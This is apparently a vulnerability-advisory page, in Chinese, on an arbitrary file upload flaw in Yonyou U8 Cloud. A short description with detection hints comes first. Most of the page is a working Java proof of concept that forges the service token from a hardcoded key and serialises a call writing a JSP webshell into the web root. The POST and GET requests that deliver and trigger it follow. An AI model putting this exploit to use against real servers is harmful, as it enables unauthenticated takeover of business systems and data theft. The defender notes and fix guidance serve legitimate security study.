用友 U8 Cloud IPFxxFileService 任意文件上传漏洞

日期: 2025-09-18 14:08:11 | 影响软件: 用友U8 Cloud | POC: 已公开

漏洞描述

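文件上传漏洞发生在应用程序允许用户上传文件的功能中：如果上传功能未能正确验证和限制上传文件的类型和内容，攻击者可能利用此漏洞上传恶意文件（例如包含可执行代码的脚本文件），从而在服务器上执行任意命令，控制或破坏系统。就本页给出的 PoC 而言，请求经 /ServiceDispatcherServlet 调用 nc.itf.uap.pfxx.IPFxxFileService 接口的 writeDocToXMLFile 方法，并向其传入文件内容和目标路径；PoC 中的目标路径位于 webapps/u8c_web 目录下，扩展名为 .jsp。排查时可关注对 /ServiceDispatcherServlet 的 POST 请求、其后对陌生 .jsp 文件的访问，以及 Web 目录下新出现的 .jsp 文件；修复以厂商发布的补丁为准，并应限制该接口的外部访问。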

PoC代码

import nc.bs.framework.common.InvocationInfo;
import nc.bs.framework.comn.NetObjectOutputStream;
import nc.bs.framework.exception.FrameworkRuntimeException;
import nc.bs.framework.server.token.MD5Util;

import java.io.*;
import java.net.HttpURLConnection;
import java.net.URL;
import java.nio.file.Files;
import java.nio.file.Paths;
import java.security.MessageDigest;
import java.util.Base64;
import java.util.zip.ZipEntry;
import java.util.zip.ZipOutputStream;


/**
 * Proof-of-concept generator published with the advisory: it builds a serialized
 * {@code InvocationInfo} that names the remote interface
 * {@code nc.itf.uap.pfxx.IPFxxFileService} and its method {@code writeDocToXMLFile},
 * then prints the serialized object Base64-encoded. Nothing is sent over the network
 * by this class; the page shows the request separately as
 * {@code POST /ServiceDispatcherServlet}.
 *
 * <p>Reviewer notes for defenders, based only on what this listing shows:
 * <ul>
 *   <li>The invocation carries raw file bytes plus a destination path chosen by the
 *       caller; in this listing the path is inside {@code webapps/u8c_web} and ends in
 *       {@code .jsp}. Presumably the server-side method applies no restriction on
 *       directory or extension - confirm against the vendor fix.</li>
 *   <li>The token is derived from the user code and a constant embedded in this file
 *       (see {@link #genToken(String)}); no per-installation secret or session state
 *       is involved on the client side.</li>
 *   <li>Useful signals: POST requests to {@code /ServiceDispatcherServlet} followed by
 *       a first-time GET of a {@code .jsp} under the web application, and new
 *       {@code .jsp} files appearing in that directory.</li>
 * </ul>
 */
public class ServiceDispatcherServlet {
    /**
     * Builds the invocation object, serializes it to {@code ./ser1.bin}, and prints the
     * file's contents as Base64 on standard output.
     *
     * @param args unused
     * @throws Exception on any I/O or serialization failure
     */
    public static void main(String[] args) throws Exception {
        // Bytes of the local file that become the first argument of the remote call.
        byte[] data = createData("./shell.jsp");

        String userCode = "1";
        String service = "nc.itf.uap.pfxx.IPFxxFileService";

        String method = "writeDocToXMLFile";
        // Parameter types of the remote method: file content and target path.
        Class[] classes = {byte[].class, String.class};
        // The second argument is a server-side path; here it points into the web
        // application directory with a .jsp extension, i.e. a location the servlet
        // container would serve (the page later requests it with GET).
        Object[] params = {data, "webapps/u8c_web/34d1866c365ac0092638a075e2c13aac.jsp"};
        InvocationInfo invocationInfo = new InvocationInfo(service, method, classes, params);
        invocationInfo.setUserCode(userCode);
        // Token is computed locally from the user code alone; see genToken.
        invocationInfo.setToken(genToken(userCode));
        // Serialized with the framework's own stream class rather than plain
        // ObjectOutputStream; the wire format is defined by NetObjectOutputStream,
        // which is not shown on this page.
        FileOutputStream fos = new FileOutputStream("./ser1.bin");
        NetObjectOutputStream.writeObject(fos, invocationInfo);

        byte[] bytes = Files.readAllBytes(Paths.get("./ser1.bin"));
        String s = Base64.getEncoder().encodeToString(bytes);
        System.out.println(s);
    }

    /**
     * Reads a file fully into memory.
     *
     * @param filePath path of the file to read
     * @return the file's bytes
     * @throws IOException if the file cannot be read
     */
    public static byte[] createData(String filePath) throws IOException {
        return Files.readAllBytes(Paths.get(filePath));
    }

    /**
     * Hashes {@code tokens} followed by {@code key}. Despite the method name, the
     * algorithm requested is SHA-1, not MD5.
     *
     * @param key    bytes fed to the digest second
     * @param tokens bytes fed to the digest first
     * @return the SHA-1 digest of {@code tokens || key}
     * @throws FrameworkRuntimeException wrapping any exception raised while hashing
     */
    private static byte[] md5(byte[] key, byte[] tokens) {
        MessageDigest md = null;

        try {
            md = MessageDigest.getInstance("SHA-1");
            // Order matters for the resulting value: tokens first, then key.
            md.update(tokens);
            md.update(key);
            return md.digest();
        } catch (Exception var5) {
            Exception e = var5;
            throw new FrameworkRuntimeException("md5 error", e);
        }
    }

    /**
     * Computes the token placed on the invocation for the given user code.
     *
     * <p>NOTE(review): the key is a string literal in this file. If the server checks
     * tokens against the same constant, as this PoC implies, the token is predictable
     * for any user code and does not authenticate the caller; a fix would need a secret
     * that is unique per installation and not shipped in client-reachable code.
     *
     * @param userCode user code the token is bound to
     * @return the digest as text; presumably a hex string, since the conversion is done
     *         by {@code MD5Util.byteToHexString}, which is not shown on this page
     */
    public static String genToken(String userCode) {
        // getBytes() without a charset uses the platform default encoding.
        byte[] md5 = md5("ab7d823e-03ef-39c1-9947-060a0a08b931".getBytes(), userCode.getBytes());
        return MD5Util.byteToHexString(md5);
    }
}


POST /ServiceDispatcherServlet HTTP/1.1

{{base64decode(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)}}

GET /34d1866c365ac0092638a075e2c13aac.jsp HTTP/1.1
